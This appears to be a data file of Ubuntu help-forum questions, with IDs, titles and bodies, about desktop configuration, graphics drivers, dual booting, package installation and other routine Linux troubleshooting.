426157	swapping out icon set for a different one ( 13.10 , ambience theme ) ? [ solved ]	i have hunted for an answer to this one , which must be out there , but i only seem to find older , out-dated `` solutions '' . i would like to use the new lubuntu box icon set in ubuntu 13.10 . but how ? ? my set-up at the moment is almost standard ... other than using nitrogen to manage a dual-screen display , and the patched nemo which requires me to do this : gsettings set org.nemo.desktop show-desktop-icons false many thanks for any help with this !
426160	what is the `` free software only '' option when installing ubuntu ?	when installing ubuntu , you get a free software only option . does that free software only option mean free as in beer or free as in freedom ? when i say free as in freedom , i mean fsf type of freedom . image source : how do i make ubuntu use only free software ?
426163	toshiba satellite p755-s5269 keyboard backlight does n't work	i 'm new to ubuntu and i have a problem with the keyboard backlight on my laptop . i was looking for solutions on the web but unfortunately i could not find anything specific . my laptop model is toshiba satellite p755-s5269 . in the bios keyboard backlight is set to on . does anyone have this model laptop and managed to solve this problem ? eco mode if off , as well as the bios setting for the backlight is on . i just tried fn+z but it still does n't work . i have n't tried the media key for illumination because i do n't know where 's the media key for illumination ? my configuration file /etc/default/grub looks after modification as follows - > http : //pastebin.com/wx0rbug1
426166	how do i determine which process is using more physical memory ?	i 've already run free -t -m and ps aux -- sort -rss , but i do n't understand why there 's a difference between the output of these two commands regarding the amount of total physical memory currently being used . the outputs are as follows . # free -t -m total used free shared buffers cached mem : 995 863 132 0 30 658 -/+ buffers/cache : 173 821 swap : 0 0 0 total : 995 863 132 # ps aux -- sort -rss user pid % cpu % mem vsz rss tty stat start time command mysql 824 0.0 6.1 887776 63128 ? ssl feb24 0:35 /usr/sbin/mysqld www-data 1411 0.0 1.5 235640 15696 ? s feb24 0:01 /usr/sbin/apache2 -k start www-data 1349 0.0 1.5 238744 15300 ? s feb24 0:01 /usr/sbin/apache2 -k start www-data 1158 0.0 1.4 238308 14812 ? s feb24 0:02 /usr/sbin/apache2 -k start www-data 1412 0.0 1.4 238264 14764 ? s feb24 0:01 /usr/sbin/apache2 -k start www-data 906 0.0 1.3 234120 14200 ? s feb24 0:02 /usr/sbin/apache2 -k start www-data 2673 0.0 1.3 234096 14044 ? s 12:52 0:00 /usr/sbin/apache2 -k start www-data 1413 0.0 1.2 236368 12916 ? s feb24 0:01 /usr/sbin/apache2 -k start www-data 2577 0.0 1.1 232496 12184 ? s 10:54 0:00 /usr/sbin/apache2 -k start www-data 1484 0.0 1.1 232180 12028 ? s feb24 0:01 /usr/sbin/apache2 -k start www-data 2675 0.0 1.1 231924 11704 ? s 12:53 0:00 /usr/sbin/apache2 -k start root 867 0.0 0.9 229388 9888 ? ss feb24 0:03 /usr/sbin/apache2 -k start root 2939 0.0 0.4 88304 4084 ? ss 16:20 0:00 sshd : root @ pts/0 root 1023 0.0 0.3 584428 3840 ? sl feb24 0:00 /usr/sbin/console-kit-daemon -- no-daemon root 2956 0.0 0.3 21872 3148 pts/0 ss 16:20 0:00 -bash root 620 0.0 0.2 52252 2836 ? ss feb24 0:00 /usr/sbin/sshd -d root 1 0.0 0.2 26756 2428 ? ss feb24 0:00 /sbin/init syslog 428 0.0 0.1 247456 1560 ? sl feb24 0:01 rsyslogd -c5 root 3094 0.0 0.1 18600 1300 pts/0 r+ 17:06 0:00 ps aux -- sort -rss root 316 0.0 0.1 21552 1272 ? ss feb24 0:00 /sbin/udevd -- daemon 102 408 0.0 0.1 24004 1140 ? ss feb24 0:00 dbus-daemon -- system -- fork root 766 0.0 0.1 21324 1028 ? ss feb24 0:00 cron root 725 0.0 0.0 15828 976 tty5 ss+ feb24 0:00 /sbin/getty -8 38400 tty5 root 739 0.0 0.0 15828 976 tty3 ss+ feb24 0:00 /sbin/getty -8 38400 tty3 root 743 0.0 0.0 15828 976 tty6 ss+ feb24 0:00 /sbin/getty -8 38400 tty6 root 719 0.0 0.0 15828 972 tty4 ss+ feb24 0:00 /sbin/getty -8 38400 tty4 root 735 0.0 0.0 15828 964 tty2 ss+ feb24 0:00 /sbin/getty -8 38400 tty2 root 900 0.0 0.0 15828 960 tty1 ss+ feb24 0:00 /sbin/getty -8 38400 tty1 root 453 0.0 0.0 21548 816 ? s feb24 0:00 /sbin/udevd -- daemon root 454 0.0 0.0 21548 816 ? s feb24 0:00 /sbin/udevd -- daemon root 763 0.0 0.0 4376 684 ? ss feb24 0:00 acpid -c /etc/acpi/events -s /var/run/acpid.socket root 313 0.0 0.0 17316 636 ? s feb24 0:00 upstart-udev-bridge -- daemon root 303 0.0 0.0 15268 412 ? s feb24 0:00 upstart-file-bridge -- daemon root 600 0.0 0.0 15256 412 ? s feb24 0:00 upstart-socket-bridge -- daemon daemon 767 0.0 0.0 19124 168 ? ss feb24 0:00 atd root 2 0.0 0.0 0 0 ? s feb24 0:00 [ kthreadd ] i 've got 243068 kb ( 237 mb ) as the sum of rss column and the free command shows 863 mb being used . am i doing something wrong ? can i assume the mysql as the main process consuming the physical memory , despite the big difference ? is it really using 63128 kb ( 61 mb ) ? **update** very nice website explaining how to interpret the free -t -m output : http : //www.linuxatemyram.com/
426169	use default ltsp user accounts	i am using edubuntu with ltsp , using lts.conf machines auto login , i want the user accounts to purge on logout so no files are saved , all history is deleted and any changes revert back to the template user account .
426174	problem while coping files in usb drive	i 've a usb 2.0 drive . today while i coping some media files in the pendrive , i found that it stucked in middle . i 'd wait for half an hour , it remains unchanged ! i thought that this is may be problem with my pendrive . i tried with another pendrive and got the same result ! ! what can i do ?
426176	resolution problem with nvidia gt 620	so today my computer needed a reboot and when it booted back up my resolution had changed . it used to be either 1280ă1024 or 1400x900 i ca n't remember but now after fighting with the gui display settings and the nvidia settings i have both set at 1024x768 . here is my xorg.conf and xrandr just in case . xorg : # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 331.20 ( buildd @ marid ) tue dec 17 12:09:37 utc 2013 # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 304.117 ( buildmeister @ swio-display-x86-rhel47-01 ) tue nov 26 22:29:40 pst 2013 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` crt-0 '' horizsync 30.0 - 83.0 vertrefresh 55.0 - 75.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gt 620 '' endsection section `` screen '' # removed option `` metamodes '' `` crt : 1400x900 +1400+0 , dfp : 1400x900 +0+0 '' # removed option `` nvidiaxineramainfoorder '' `` dfp-1 '' # removed option `` metamodes '' `` crt : 1024x768 +1024+0 , dfp : 1024x768 +0+0 '' # removed option `` nvidiaxineramainfoorder '' `` crt-0 '' # removed option `` metamodes '' `` crt : 1280x1024 +0+0 '' # removed option `` metamodes '' `` crt : nvidia-auto-select +1024+0 , dfp : 1024x768 +0+0 '' # removed option `` metamodes '' `` crt : 1024x768_60 +1024+0 , dfp : 1024x768_60 +0+0 '' # removed option `` metamodes '' `` crt : nvidia-auto-select +1024+0 , dfp : 1024x768 +0+0 '' # removed option `` metamodes '' `` dvi-i-0 : 1024x768 +1024+0 , hdmi-0 : 1024x768 +0+0 '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` nvidiaxineramainfoorder '' `` dfp-1 '' option `` metamodes '' `` dvi-i-0 : nvidia-auto-select +1024+0 , hdmi-0 : 1024x768 +0+0 '' option `` sli '' `` off '' option `` multigpu '' `` off '' option `` basemosaic '' `` off '' subsection `` display '' depth 24 endsubsection endsection xrandr : screen 0 : minimum 8 x 8 , current 2944 x 1080 , maximum 16384 x 16384 dvi-i-0 connected 1024x768+1024+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1024x768 75.0*+ 70.1 60.0 1920x1200 60.0 1920x1080 59.9 1792x1344 60.0 1680x1050 74.9 69.9 60.0 59.9 1600x1200 65.0 60.0 1440x900 59.9 1400x1050 74.8 70.0 60.0 1360x768 60.0 59.8 1280x1024 75.0 60.0 1280x960 60.0 1152x864 75.0 75.0 70.0 60.0 960x600 120.0 960x540 120.0 840x525 149.9 139.8 120.0 119.8 832x624 74.6 800x600 75.0 72.2 60.3 56.2 720x450 119.8 700x525 149.5 120.0 680x384 119.9 119.6 640x480 75.0 72.8 59.9 512x384 140.1 120.0 400x300 144.4 320x240 145.6 120.1 dvi-i-1 disconnected ( normal left inverted right x axis y axis ) hdmi-0 connected 1024x768+0+0 ( normal left inverted right x axis y axis ) 880mm x 500mm 1920x1080 60.0 + 59.9 50.0 1600x1200 60.0 1280x720 59.9 1024x768 60.0* 800x600 60.3 720x480 59.9 640x480 59.9 they are matching acer al1916w monitors . i think it 's treating them as one but i do n't know . can anyone help ?
426177	how to update libnet-amazon-ec2-perl to latest version in sausy	i have ubuntu saucy . 13.10 . i have libnet-amazon-ec2-perl installed which is 0.23 in 13.10 saucy . how do i upgrade the libnet-amazon-ec2-perl to latest 0.24 version ? i did try sudo apt-get update and installing . but it says it is up to date .
426182	just bought an hp envy 4500 all in one and using the usb connection can not get ubuntu 12.04 to register printer functions	no idea how to install printer/copier/scanner using ubuntu 12.04 and can not get computer to recognize device when connected with usb cable .
426184	ubuntu 13.10 goes completely black after signing in after i cleaned my system with bleachbit	it was all working fine , unless i cleaned my system using bleachbit . it is n't the first time i am using bleachbit . but this time , something went wrong . after bleachbit completed its operation , my system started showing filled hard disk ( no free space at all ) . how come this happened ? i thought a restart might resolve this . when i restarted , the login screen appeared . but when i logged in , the screen went black with only the cursor displayed on it . this happens everytime i try to start my pc . i tried everything suggested on the net , but nothing worked . need help . thank you .
426187	no login screen just purple ?	i 'm completely new to ubuntu . i just dual booted using the ubuntu wubi installer and it was fine for a little while , however the software center would n't open , so i just tried to restart my computer . now all i 'm getting when i try to boot ubuntu is a purple screen , no ubuntu logo or login screen .
426188	build error maven package for dspace	i am using ubuntu 13.10 and having proxy server using userid and password . apt-get and wget command working properly . i am trying to install `` mvn packages '' command needed for dspace software , so which file i have to configure so maven package will get downloaded . for your kind information i have modified /etc/maven2/settings.xml proxy for maven . kindly suggest where i have to modify more file to do work . with regards , vijay
426192	did i install ubuntu correctly ?	i have two hard drives . the first has windows 8 on it . i wanted to install ubuntu 13.10 on the second drive , a ssd . i wanted to put grub on this drive , so that i did n't have to touch or mess with the windows partitions at all . when installation finished , i tried to set the ssd to be the primary boot drive , but it seemed to be skipped over , and windows booted up instead . i went into my bios , and it appears that ubuntu is on sata 1 , which is the windows drive . did i screw up the installation location of grub ? bios boot sequence entry looks like this . ( by moving ubuntu/grub above windows boot manager in this sequence , i am now able to select between ubuntu and w8 at startup . ) but i 'm not sure what the consequences are if grub really is on the windows partition , especially when it comes to system recovery , etc . here is some additional info from a windows based boot-analysis tool : there are a total of 5 entries listed in the bootloader . default : windows 8 timeout : 30 seconds easybcd boot device : c : \ entry # 1 name : ubuntu bcd id : { 87379fd5-9e3e-11e3-be7b-806e6f6e6963 } device : \device\harddiskvolume2 bootloader path : \efi\ubuntu\shimx64.efi entry # 2 name : ubuntu bcd id : { 87379fd6-9e3e-11e3-be7b-806e6f6e6963 } device : \device\harddiskvolume2 bootloader path : \efi\ubuntu\grubx64.efi entry # 3 name : generic usb device bcd id : { 15f8d732-878e-11e3-be70-806e6f6e6963 } device : unknown bootloader path : entry # 4 name : cd/dvd device bcd id : { 15f8d733-878e-11e3-be70-806e6f6e6963 } device : unknown bootloader path : entry # 5 name : windows 8 bcd id : { current } drive : c : \ bootloader path : \windows\system32\winload.efi
426193	vmware : enable drag and drop files and folder between virtual machine and host	it was working to me , that i could drag a file / folder from ubuntu virtual machine and drop it on windows 7 desktop , but for no know reason it stopped working . how to fix this issue ?
426194	nano save to stdout ( or an inline editor for terminal )	is there a way of saving nano to stdout ? or an inline editor for terminal ? i mean , i would like to do things as for example , editing an interactive php script like ( from terminal ) : $ php < < code < ? php echo `` hello world\n '' ; ? > code but that shell inline editing ( using heredoc ) is too precarius to my comprehension in moment .
426197	how can i quit a frozen application ?	i ca n't get alt-f2 to do anything . the mouse will not respond ; the application just freezes - way too often , i may add , way too often . do i have a `` bot '' on my computer ? what can i do if i do ? clamtk just froze on me twice in the last hour . what can i do to get my computer to be mine again ?
426198	shell scripting	i 'm trying to run my .sh file but when i try to execute it it does n't work . i did echo ' # ! /bin/bash ' > cadetkpgm.sh in order for the .sh file to be executable but when i use ./cadetkpgm.sh or bash cadetkpgm.sh to run the file t it does n't work ... any ideas ?
426206	dual boot problems windows 8 & ubuntu 12.04	i have installed ubuntu 12.04 on my laptop with windows 8 pre- installed . but when selecting windows 8 to boot i get following error . error : unknown command â´drivemap'error : invalid efi filepath i ran boot repair . the output can be found here : http : //paste.ubuntu.com/6995882/ i hope anyone can help me ! thank you !
426209	keyboard backlight	i have a samsung series 7 np700z5ah with keyboard backlight . after ubuntu install it doesnt work , is it possible to fix ? there was a `` fucntion '' shortcut for the sharpness of the light fn+f9/f10 .
426210	how can i run sublime text from the launcher as root every time ?	i am kind of lazy . is there a way to when i click on the sublime text icon for it to automatically run as gksudo ?
426211	auto start openvpn with one .ovpn file	hi i have bought vpn access form a vpn provider , i have all of thees .ovpn files inn /tmp/astrill . yes i have made thoes folders . how can i get openvpn to startup one of thees .opvn files under start/boot up ? i would like to , not have to run openvpn -- config vpnservername.ovpn evry time i have to do a reboot . i 'm running ubuntu 12.04 no gui . yes i have installed openvpn thaks -- new vpn user
426214	xrandr - ldvs1 detected but does n't actually exist	i have a pc-mini with one dvi output -- and nothing else . when i check xrandr i see this : lvds1 connected ( normal left inverted right x axis y axis ) 1024x768 60.0 + 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 connected 1680x1050+0+0 ( normal left inverted right x axis y axis ) 474mm x 296mm 1680x1050 60.0*+ 1600x1200 60.0 1400x1050 59.9 1280x1024 75.0 60.0 1440x900 59.9 1280x960 60.0 1152x864 75.0 1024x768 75.1 70.1 60.0 832x624 74.6 800x600 72.2 75.0 60.3 56.2 640x480 72.8 75.0 66.7 60.0 720x400 70.1 640x400 70.0 anyway i have it disabled , just confused as to why it would even appear and if anyone can help me shed some light on it . double kudos if anyone can tell me why my dvi appears to be an hdmi in xrandr . thanks
426218	ubuntu 13.10 + steam	i just recently upgraded to 13.04 from 13.10 on x64 . since the upgrade , downloads on steam have been incredibly slow and slow down all other processes . it 's not my network connection as other programs and my latency is fine . what 's the best first step to learn more about the problem and how can i find out if this is a result of the 13.04 - > 13.10 upgrade ?
426219	ubuntu displaylink ( usb graphics card ) configuration	i have device : lsusb bus 002 device 006 : id 17e9:0199 displaylink please help to to run it . ( monitor is turned on - i can switch to it witch ctrl+f1 ) but is not visible in monitors configure , and canot setup to display x serwer on it . i need install older kernel like here ? - http : //jochen.kirstaetter.name/blog/linux/using-aoc-usb-monitor-in-ubuntu-1304-displaylink-e1649fwu.html i have : on linux 3.11.0-17-generic # 31-ubuntu smp mon feb 3 21:52:43 utc 2014 x86_64 x86_64 x86_64 gnu/linux ubuntu 13.10 i found similar post - but old and now not work - //ubuntuforums . org/showthread.php ? t=2083765 //ubuntuforums . org/showthread.php ? t=1364207 & p=9537133 # post9537133 -sudo apt-get install xserver-xorg-video-displaylink = not found -edit /etc/gdm/init/default = is empty dmesg 406.264623 ] usb 2-5 : usb disconnect , device number 5 [ 406.265171 ] released /dev/fb0 user=0 count=0 [ 406.265276 ] console : switching to colour dummy device 80x25 [ 406.265331 ] drm_kms_helper : drm : unregistered panic notifier [ 409.518913 ] usb 2-5 : new high-speed usb device number 6 using ehci-pci [ 414.629560 ] usb 2-5 : device descriptor read/64 , error -32 [ 414.866679 ] usb 2-5 : new usb device found , idvendor=17e9 , idproduct=0199 [ 414.866692 ] usb 2-5 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 414.866699 ] usb 2-5 : product : usb adapter [ 414.866705 ] usb 2-5 : manufacturer : displaylink [ 414.866710 ] usb 2-5 : serialnumber : 165002013109436 [ 414.871647 ] [ drm ] vendor descriptor length:22 data:22 5f 01 00 20 05 00 01 03 04 02 [ 415.031781 ] open /dev/fb0 user=0 fb_info=ffff8801feb94000 count=1 [ 415.032079 ] console : switching to colour frame buffer device 160x64 [ 415.032102 ] udl 2-5:1.0 : fb0 : udldrmfb frame buffer device [ 415.032108 ] udl 2-5:1.0 : registered panic notifier [ 415.032117 ] [ drm ] initialized udl 0.0.1 20120220 on minor 0 xorg section `` serverlayout '' identifier `` aticonfig layout '' screen 0 `` aticonfig-screen [ 0 ] -0 '' 0 0 screen 1 `` displaylinkscreen '' above `` screen0 '' option `` xinerama '' `` off '' endsection section `` module '' endsection section `` monitor '' identifier `` aticonfig-monitor [ 0 ] -0 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' endsection section `` device '' identifier `` aticonfig-device [ 0 ] -0 '' driver `` fglrx '' busid `` pci:1:0:0 '' endsection section `` screen '' identifier `` aticonfig-screen [ 0 ] -0 '' device `` aticonfig-device [ 0 ] -0 '' monitor `` aticonfig-monitor [ 0 ] -0 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection # # # # # # # # # # # # # # displaylink stuff # # # # # # # # # # # # # # # section `` device '' identifier `` displaylinkdevice '' # driver `` displaylink '' option `` fbdev '' `` /dev/fb0 '' driver `` fbdev '' option `` fbdev '' `` /dev/fb0 '' option `` shadowfb '' `` off '' endsection section `` monitor '' identifier `` displaylinkmonitor '' endsection section `` screen '' identifier `` displaylinkscreen '' device `` displaylinkdevice '' monitor `` displaylinkmonitor '' subsection `` display '' depth 16 # modes `` 1900x1200 '' modes `` 1024x768 '' endsubsection endsection lsmod module size used by udlfb 23092 0 fb_sys_fops 12703 1 udlfb pci_stub 12622 1 vboxpci 23194 0 vboxnetadp 25670 0 vboxnetflt 27613 0 vboxdrv 335365 3 vboxnetadp , vboxnetflt , vboxpci parport_pc 32701 1 ppdev 17671 0 bnep 19704 2 rfcomm 69130 0 bluetooth 372041 10 bnep , rfcomm binfmt_misc 17468 1 dm_crypt 22832 0 dell_wmi_aio 12652 0 joydev 17377 0 sparse_keymap 13948 1 dell_wmi_aio dcdbas 14847 0 snd_hda_codec_realtek 56405 1 uvcvideo 80885 0 snd_hda_intel 52267 3 videobuf2_vmalloc 13216 1 uvcvideo videobuf2_memops 13362 1 videobuf2_vmalloc snd_hda_codec 188738 2 snd_hda_codec_realtek , snd_hda_intel fglrx 6732964 132 videobuf2_core 40499 1 uvcvideo snd_hwdep 13602 1 snd_hda_codec snd_pcm 102033 2 snd_hda_codec , snd_hda_intel videodev 133509 2 uvcvideo , videobuf2_core snd_page_alloc 18710 2 snd_pcm , snd_hda_intel snd_seq_midi 13324 0 snd_seq_midi_event 14899 1 snd_seq_midi snd_rawmidi 30095 1 snd_seq_midi snd_seq 61560 2 snd_seq_midi_event , snd_seq_midi hid_multitouch 17407 0 hid_topseed 12586 0 snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi snd_timer 29433 2 snd_pcm , snd_seq kvm_amd 59987 0 kvm 431720 1 kvm_amd snd 69141 16 snd_hda_codec_realtek , snd_hwdep , snd_timer , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , snd_seq_device , snd_seq_midi soundcore 12680 1 snd lib80211_crypt_tkip 17619 0 wl 4207760 0 microcode 23656 0 psmouse 97655 0 ir_lirc_codec 13021 0 ir_mce_kbd_decoder 13214 0 ir_nec_decoder 12915 0 ir_jvc_decoder 12751 0 lirc_dev 19980 1 ir_lirc_codec ir_rc6_decoder 12874 0 ir_sony_decoder 12713 0 ir_sanyo_decoder 12839 0 ir_rc5_decoder 12710 0 lp 17759 0 serio_raw 13413 0 rc_rc6_mce 12502 0 k10temp 13126 0 lib80211 14381 2 wl , lib80211_crypt_tkip sp5100_tco 13979 0 edac_core 62342 0 edac_mce_amd 22617 0 cfg80211 480503 1 wl i2c_piix4 22106 0 mac_hid 13205 0 amd_iommu_v2 19054 1 fglrx nuvoton_cir 17778 0 parport 42299 3 lp , ppdev , parport_pc rc_core 27718 11 nuvoton_cir , ir_lirc_codec , ir_rc5_decoder , ir_nec_decoder , ir_sony_decoder , ir_mce_kbd_decoder , ir_jvc_decoder , ir_rc6_decoder , ir_sanyo_decoder , rc_rc6_mce usbhid 53014 0 hid 101762 3 hid_multitouch , hid_topseed , usbhid udl 24713 1 drm_usb 13134 1 udl syscopyarea 12529 2 udl , udlfb sysfillrect 12701 2 udl , udlfb sysimgblt 12640 2 udl , udlfb drm_kms_helper 52710 1 udl drm 297056 3 udl , drm_usb , drm_kms_helper wmi 19070 1 dell_wmi_aio video 19318 0 r8169 67581 0 ahci 25819 3 mii 13934 1 r8169 libahci 32009 1 ahci
426223	how to remove an unsuccessful installation of java 6	i unsuccessfully tried installing java 6 by copy-pasting the following from http : //www.webupd8.org/2012/11/oracle-sun-java-6-installer-available.html in the terminal window : sudo add-apt-repository ppa : webupd8team/java sudo apt-get update sudo apt-get install oracle-java6-installer it was running well until it came to a point where something like [ connecting elibrary.oracle.com ... connected ] showed up ( sorry i ca n't remember it correctly ) . there it was stuck for a good 3 hours . so i had to close the terminal down , thereby killing the process midway . can anyone please tell me how to remove anything that has already been installed and take the system back to the state it was before attempting this installation . any help is highly appreciated . regards , bob .
426226	tuxguitar sound inconsistent after upgrading to ubuntu 13.10	in tuxguitar ( http : //tuxguitar.herac.com.ar/ ) , i have been using the fluidsynth plug-in to output the midi conversion using various soundfonts . this has worked well enough since ubuntu 10.04 . after updating my system from 13.04 to 13.10 , the sound now works sometimes and does n't others . the failure makes all of the output sound like it 's being played through a broken speaker . there is sound , but it 's crackling and sort of sounds like a piece of metal being thrashed back and forth ( any sense of pitch is lost ) . the cause of the failure is unknown . it will be working well , and then less than two seconds later make the terrible noises . i can make no changes , simply press 'play ' then 'stop ' and then 'play ' again and the first time it will work and the second time it will fail . i have attempted multiple reinstalls of both the software and the fluidsynth plugin , installing from source as well as from ubuntu 's software center . among other fixes , i 've tried using the built in gervill sequencer ( which also failed ) and using the alsa output . other software seems to be working correctly ( musescore is running the fluidsynth plug-in with no crashes ) . edit : after trying the gervill sound output with the `` real time sequencer '' gervill is behaving correctly . this is not a complete solution though , as gervill sounds terrible and does not allow for any new soundfonts . the problem may lie with how the fluidsynth plug-in is behaving ; though that does explain the problems below . other bugs in tuxguitar after upgrade is the `` history '' tab not loading within the file menu and frequent crashes when attempting to open new files . i have yet to find any workarounds for this problem . here is an error trace from running the program in the terminal ; but these were present even in 13.04 when the program still ran correctly . each of these is repeated hundreds of times . ( tuxguitar:5919 ) : glib-gobject-critical ** : g_closure_add_invalidate_notifier : assertion 'closure- > n_inotifiers < closure_max_n_inotifiers ' failed ( tuxguitar:5919 ) : glib-gobject-warning ** : /build/buildd/glib2.0-2.38.1/./gobject/gclosure.c:697 : unable to remove uninstalled invalidation notifier : 0x7fcd9fb92be0 ( 0x7fcde4562850 ) what upgrades during 13.04- > 13.10 may have effected the tuxguitar dependencies that could cause it to become unstable ?
426227	app , home lenses not working	i 've read every possible forum on this topic , however none of them seem to work . i have ubuntu 13.10 and i installed gnome 3.10 on it despite the warnings , it was badly incomplete and so i first uninstalled gdm and many more packages , everything went bad after that but i brought back everything to normal except for one thing the home and app lenses . they are both totally empty and i ca n't seem to do anything to bring them back . please help thanks in advance
426228	ubuntu 13.10 does n't allow me to install `` alongside '' windows , just `` replace ''	i have a disk with 3 partitions : 100mb for windows 7 97.56gb for windows 7 125.91 which i want to install ubuntu on how can i install ubuntu on the 125.91 gb partition `` alongside '' windows 7 ( including grub etc ) so i can dual boot between the two ? usually i get the `` alongside '' option available . if i select `` something else '' , click on the 125.91gb partition and then `` install now '' it says '' no root file system defined '' .
426237	low graphics mode error ( 12.04 ) live usb	when i tried ubuntu with the live usb i got the message that my system was running in low graphics mode . there was no mouse . when i pressed enter i got 4 options . how can i get out of this ? computer details : computer : hp 15-e011ed ( e6z10ea ) cpu : intel core i7 3632qm gpu : amd radeon hd 8670m ram : 4gb ddr3 hdd : 500gb
426238	replace `` try ubuntu without installing '' with my custom text	i have edited boot/grub/loopback.cfg of the iso . i have replaced the menuentry in it `` try ubuntu without installing '' with my text . now when i make this iso bootable using unetbootin , in the boot screen i find that `` try ubuntu without installing '' is not replaced by my own text . how can i change it
426240	up-to-date game boy emulators ?	i am looking for an up-to-date gameboy emulator for ubuntu . all of the forums i have read are old and most of the projects they list are not supported for the new ubuntu versions . does anyone know of a gameboy emulator ? i just want to play pokemon .
426242	overlay window error in application	i 'm used to start an application which gaves me the following error : xgraphics.c:897 : int xgraphicscreatewindow ( int* , int* , int , int , int , unsigned int , unsigned int , __glxcontextrec* , xvisualinfo** ) : assertion ` '' unable to create overlay window . make sure overlay is supported and enabled . '' == 0 ' failed . feb 25 21:28:14 : internal error : caught a signal before task management was initialized . feb 25 21:28:14 : exiting feb 25 21:28:14 : sigabrt - abort i 'm wondering whats the reason , overlay is supported by the gpu . could it be that the nvidia driver is to new for the application which ships in 2009 ? is there a way i can solve this ? $ lspci | grep vga 07:00.0 vga compatible controller : nvidia corporation gk104 [ geforce gtx 690 ] ( rev a1 ) $ lsb_release -a lsb version : core-2.0-amd64 : core-2.0-noarch : core-3.0-amd64 : core-3.0-noarch : core-3.1-amd64 : core-3.1-noarch : core-3.2-amd64 : core-3.2-noarch : core-4.0-amd64 : core-4.0-noarch : cxx-3.0-amd64 : cxx-3.0-noarch : cxx-3.1-amd64 : cxx-3.1-noarch : cxx-3.2-amd64 : cxx-3.2-noarch : cxx-4.0-amd64 : cxx-4.0-noarch : desktop-3.1-amd64 : desktop-3.1-noarch : desktop-3.2-amd64 : desktop-3.2-noarch : desktop-4.0-amd64 : desktop-4.0-noarch : graphics-2.0-amd64 : graphics-2.0-noarch : graphics-3.0-amd64 : graphics-3.0-noarch : graphics-3.1-amd64 : graphics-3.1-noarch : graphics-3.2-amd64 : graphics-3.2-noarch : graphics-4.0-amd64 : graphics-4.0-noarch : printing-3.2-amd64 : printing-3.2-noarch : printing-4.0-amd64 : printing-4.0-noarch : qt4-3.1-amd64 : qt4-3.1-noarch distributor id : ubuntu description : ubuntu 12.04.4 lts release : 12.04 codename : precise $ cat /proc/driver/nvidia/version nvrm version : nvidia unix x86_64 kernel module 331.20 wed oct 30 17:43:35 pdt 2013 gcc version : gcc-version 4.6.4 ( ubuntu/linaro 4.6.4-1ubuntu1~12.04 )
426245	wget : recursively search website for all files that end in file format ?	is there a way to recursively search all sub-directories of a website for a specific file format ? http : //somewebsite.com/parent/subdirectories/somefile.format
426246	time and date not available	my time and date not on the menu bar and the clock is not in the system settings . i ran sudo apt-get install indicator-datetime and received this error : package indicator-datetime is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'indicator-datetime ' has no installation candidate
426247	what if i install a 64bit version of ubuntu/kubuntu with less than 4 gb of ram ?	i need to install a 64bit version of kubuntu ( i 'd like this one because i like kde , it should not be a problem as repositories are the same , right ? ) because i need to work with some x64 libraries . my processos is an x64 , old amd dual core , while my ram is just 2 gb . is it a problem to install a 64bit version of kubuntu ?
426248	ubuntu 13.10 window borders tear and icon change	i have a really odd problem . i have a laptop with a optimum graphics card , in case it matters . i 've been using bumblebee and had no problems for absolute months . this afternoon there was an update available which i installed and carried on with my work . however , now that i have logged back in again , my icons which i had changed are reverted back to the default , my notification box is now a plain black ( like no 3d ) , and the window borders are either tearing , or completely transparent . i thought it may be my graphics card but running bumblebee runs as expected . there were graphics drivers updates waiting , but that changed nothing , and strangely enough , a few 'ubuntu-desktop ' packages were missing . anyone have any ideas how i can fix this weird issue ? image : my graphics card ( lspci ) : vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) and : vga compatible controller : nvidia corporation gk107m [ geforce gt 640m ] ( rev ff ) ( prog-if ff ) ! ! ! unknown header type 7f ( not currently running )
426250	receiving an error when trying to delete a file ?	i 'm trying to remove some files from an installation i screwed up . i went to the directory in the terminal , and typed sudo rm pcsx but it tells me it does n't exist even though i can quite clearly see it . how do i fix this ?
426259	how can i get the solarized color theme for mate terminal ?	i would like to have the solarized theme in mate 1.6 terminal . how can i get it ?
426261	is juju bootstrap node a single point of failure ?	what happens if i somehow lose my bootstrapped node ? is there a way to make my bootstrapped node ha ? thanks !
426265	google chrome install	hi i am new to ubuntu linux , i have installed on my dell latitude d600 every thing 's smooth and fast , i have bean trying to install google chrome , which i would like to use on ubuntu , but unfortunately , it shell will not let me install it on my laptop .
426268	how do i change the color of desktop icon text	gnome-shell 's desktop is unusable with any light colored wallpaper as the icon names ( also white ) are unreadable . there does n't seem to be anyway to change their color , changing various themes does n't seem to help either . example :
426274	hide fingerprint-gui dialog	my computer has a fingerprint reader , so i installed the fingerprint-gui ppa/package in order to use it . it works perfectly , but the dialog box looks very bad . i like how on windows , there is never a visual indicator that you can use your fingerprint . it would be nice to just hide that window . is there a setting that would enable me to do that ?
